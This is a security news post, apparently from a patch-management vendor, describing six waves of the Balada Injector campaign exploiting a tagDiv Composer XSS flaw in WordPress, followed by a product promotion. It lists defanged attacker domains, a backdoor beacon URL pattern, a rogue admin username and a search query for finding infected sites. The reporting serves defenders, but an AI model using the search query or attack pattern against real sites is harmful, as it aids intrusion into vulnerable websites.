Contents:
A new Balada Injector campaign used known WordPress plugin and theme vulnerabilities to hack over 17,000 websites during September 2023.
Threat actors exploited the CVE-2023-3169 cross-site scripting (XSS) vulnerability in tagDiv Composer. Composer is a tool for the tagDiv’s Newspaper and Newsmag WordPress themes.
Both themes are paid for and used by 155,500 websites.
The attackers aim to create backdoors and deploy malware that diverts website visitors to malicious sites, like:
- spoofed tech support pages
- fake lottery wins
- push notification hoaxes, etc.
Threat actors often rely on unpatched known vulnerabilities to compromise websites. In April 2023 Sucuri reported that Balada Injector has been active since 2017. In the past years, Balada Injector has successfully hacked one million WordPress sites.
The attacks restarted in mid-September after security specialists revealed CVE-2023-3169 details and a Proof-of-Concept exploit. Researchers identified and described six distinct attack waves of this new Balada Injector campaign.
What connects the six Balada Injector recent attack waves?
Sucuri identified six different attack waves of the Balada Injector campaign. In all cases, the malicious actors exploited unpatched vulnerabilities to launch further operations.
Wave 1
Hackers injected malware from stay.decentralappps[.]com to compromise the websites. The vulnerability permitted the malicious code to spread on public pages. More than 5,000 sites were impacted.
Wave 2
The adversaries used a malicious script to create fake WordPress admin accounts. First they use the ”greeceman” username, then they switched to auto-generated usernames based on the site’s hostname.
”greeceman” still appears on many of the compromised domain.
Search [greeceman inurl:author] on Google to see the websites containing this malicious admin. In the results you`ll find websites that use the Newspaper theme. A lot of them are still infected with the Balada malware.
Wave 3
For the third wave hackers abused the WordPress`s theme editor to create backdoors in the Newspaper theme’s 404.php file. After they manage planting a backdoor into the 404.php file, notifications are retrieved to the Balada Injector operators.
The message is sent via a call to stock.decentralappps[.]com/dest.php?d1=<window.location.hostname> and confirms that a backdoor on that specific site is available.
Wave 4
Attackers moved on to installing a wp-zexit plugin that spoofed WordPress admin behavior and obfuscated the backdoor in the website’s Ajax interface.
Wave 5
Threat actors registered three new domains and decided to increase randomization across the injected scripts, URLs, and codes. Their new move was meant to make tracking and detection harder for security teams.
Wave 6
The last wave of Balada injections that Sucuri described started on September 29th. It involved several different scripts that used the subdomains of promsmotion[.]com to deploy malware. The attackers stopped using stay.decentralappps[.]com, and only deployed three specific injections.
All three types of the promsmotion injections affect websites that use the Newspaper theme. Usually they work together with other Balada malware. In their case, instead of using the tagDiv Composer vulnerability, hackers used the previously created backdoors and rogue admin users.
Why are known vulnerabilities not patched in time?
The Balada Injector case tells an unsettling truth. Hackers can still exploit 6 years old vulnerabilities that have been disclosed and patched since 2017.
It`s not only the WordPress themes` vulnerabilities that remain unpatched. According to Gartner, 99% of the vulnerabilities that hackers exploit to breach systems were known for at least one year.
There are two main reasons why IT admins don`t patch known vulnerabilities in time:
- Lack of awareness regarding the importance of applying an update as fast as possible.
- The System Administrator is aware of how important patching is. However, they might be overwhelmed with other tasks or fail to assess correctly which vulnerability poses the greater risk and should be patched first. You can`t apply all necessary patches at once. Also, manual patching is a slow and resource consuming task.
To put an end to known vulnerabilities creating problems, I recommend using an automated patch management solution.
Automated patch management covers the whole patch management process, from scanning to testing, deploying, and reporting. It requires the lowest amount of effort from the IT team.
Some of the automated patch management solutions` benefits are:
- less pressure on the IT team,
- increased compliance with the latest security regulations,
- increased productivity,
- reduced downtime,
- no more human error.
If you didn`t try an automated patch management solution yet, check this 30-days free trial and see what it can do for you.
If you liked this article, follow us on LinkedIn, Twitter, Facebook, and Youtube, for more cybersecurity news and topics.
Heimdal® Patch & Asset Management Software
- Schedule updates at your convenience;
- See any software assets in inventory;
- Global deployment and LAN P2P;
- And much more than we can fit in here...